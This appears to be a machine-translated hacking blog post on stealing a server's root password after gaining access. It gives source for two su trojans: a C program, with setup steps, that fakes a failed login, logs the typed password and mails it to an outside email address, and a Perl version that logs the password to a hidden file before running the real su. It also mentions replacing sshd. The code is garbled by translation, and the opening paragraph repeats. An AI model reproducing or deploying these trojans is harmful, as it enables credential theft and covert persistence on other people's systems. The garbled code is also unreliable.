After webbackdoor itself is root (potentially poor) or a vulnerability overflows to obtain the highest permissions, it can bring us many benefits if we can get the root password. I checked the methods of my predecessors. One is to cheat su to record the password, and the other is to replace sshd. Let's look at the code to cheat su to record the password! First look at the first, kpr-fakesu.c
After webbackdoor itself is root (potentially poor) or a vulnerability overflows to obtain the highest permissions, it can bring us many benefits if we can get the root password. I checked the methods of my predecessors. One is spoofing.SuRecord the password, and replace sshd. Let's take a look at the code that spoofs the su password!
First look at the first, kpr-fakesu.c V0.9beta167
Fucksu. c
/* * Kpr-fakesu.c V0.9beta167; P. * By koper * * Setting up: * Admin @ host :~ $ Gcc-o. su fakesu. c; Rm-Rf fakesu. c * Admin @ host :~ $ Mv. Su/var/tmp/. su * Admin @ host :~ $ Cp. Bash_pro File. Wge TrC * Admin @ host :~ $ Echo" AliasSu =/var/tmp/. su ">. bash_profile * Admin @ host :~ $ Logout * ** LOGIN *** * Admin @ host :~ $ Su * Password: * Su: Authenti CatIon failure * Sorry. * Admin @ host :~ $ Su * Password: * Root @ host :~ # Logout * Admin @ host :~ $ Cat/var/tmp /. PwdS * Root: DuPcia17 * Admin @ host :~ $ * */Bin/su sends varous failure information depending on the OS ver. * Please modify the source to make it "fit ";) * */ # INcLude # Include Main (int argc, char * argv []) { FILE * fp; Char * user; Char * pass; Char filEx[100]; Char clean [100]; Sprintf (filex, "/var/tmp/. pwds "); Sprintf (clean, "rm-rf/var/tmp/. su; mv-f/home/admin/. wgetrc/home/admin/. bash_profile "); If (argc = 1) user = "root "; If (argc = 2) user = argv [1]; If (argc> 2 ){ If (strCmp(Argv [1], "-l") = 0) User = argv [2]; ELsE user = argv [1];} Fprintf (stdout, "Password:"); pass = getpass (""); System ("Sleep3 "); Fprintf (stdout, "su: Authentication failure \ nSorry. \ n "); If (fp = fopen (filex, "w "))! = NULL) { Fprintf (fp, "% s: % s \ n", user, pass ); Fclose (fp ); } System (clean ); System ("rm-rf/var/tmp/. su;Ln-S/bin/su/var/tmp/. su "); /* If you don't want password in your e-mail uncomment this line :*/ System ("Uname-A>/var/tmp/. pwds; cat/var/tmp/. pwds | mail kalikosta@hotmail.com "); }
|
Perl version
Perl version:
#! /Usr/bin/perl
######################################## ######################################## ####################
# Kyle@freeshell.se 2006 su trojan check so the su path is correct .#
# Then make alias for trojan first it reads the pass then exec the real su .#
# Logging to/tmp/. pass #
######################################## ######################################## ####################
Print "Password:"; $ s1 = ;
Print "Sorry. \ n ";
$ S2 = "Password is :";
$ S3 =' Date+ % Y-% m-% d ';
Open (users, ">/tmp/. pass") | die ("cocould not open file. $! ");
Print users ($ s2, $ s1, $ s3 );
Close (users );
System ("/bin/su ")
Another method is to replace sshd.
Click to download